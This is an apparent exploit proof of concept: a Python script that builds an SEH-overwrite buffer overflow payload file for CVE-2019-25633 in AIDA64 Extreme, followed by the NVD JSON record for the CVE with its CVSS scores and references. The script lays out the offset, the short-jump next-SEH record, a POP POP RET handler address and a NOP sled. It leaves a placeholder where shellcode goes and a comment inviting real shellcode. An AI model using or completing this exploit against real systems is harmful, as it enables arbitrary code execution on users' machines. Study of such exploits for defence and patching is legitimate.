CVE-2019-25633

import sys import struct # PoC for CVE-2019-25633 - AIDA64 Extreme SEH Buffer Overflow # Description: Generates a malicious payload to trigger SEH overwrite. def create_payload(): # Offset to SEH structure (example offset, needs fuzzing for exact version) offset = 4060 # SEH Overwrite # Next SEH: jump to the shellcode (short jump) next_seh = b"\xeb\x06\x90\x90" # SE Handler: Address of POP POP RET instruction (non-ASLR module) # This address is a placeholder, replace with valid address from application DLLs seh_handler = struct.pack('<L', 0x10010000) # Nopsled nops = b"\x90" * 16 # Shellcode: MessageBoxA (Test payload) # Replace with actual shellcode for exploitation shellcode = b"\x90" * 100 # Padding padding = b"C" * 1000 payload = b"A" * offset + next_seh + seh_handler + nops + shellcode + padding return payload if __name__ == "__main__": print("[*] Generating payload for CVE-2019-25633...") buf = create_payload() print(f"[+] Payload length: {len(buf)}") # Save to file to be loaded in "Load from file" parameter with open("payload.txt", "wb") as f: f.write(buf) print("[+] Payload saved to payload.txt")

{"cve": {"id": "CVE-2019-25633", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:03.797", "lastModified": "2026-03-26T16:40:24.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIDA64 Extreme 5.99.4900 contains a structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying malicious input through the email preferences and report wizard interfaces. Attackers can inject crafted payloads into the Display name field and Load from file parameter to trigger the overflow and execute shellcode with application privileges."}, {"lang": "es", "value": "AIDA64 Extreme 5.99.4900 contiene una vulnerabilidad de desbordamiento de búfer de manejo estructurado de excepciones que permite a atacantes locales ejecutar código arbitrario al suministrar entrada maliciosa a través de las interfaces de preferencias de correo electrónico y asistente de informes. Los atacantes pueden inyectar cargas útiles manipuladas en el campo Display name y el parámetro Load from file para activar el desbordamiento y ejecutar shellcode con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:extreme:*:*:*", "matchCriteriaId": "59100A69-BA3C-4B96-B6E5-168C39A2161B"}]}]}], "references": [{"url": "http://download.aida64.com/aida64extreme599.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.aida64.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46636", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/aida64-extreme-seh-buffer-overflow-via-egghunter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}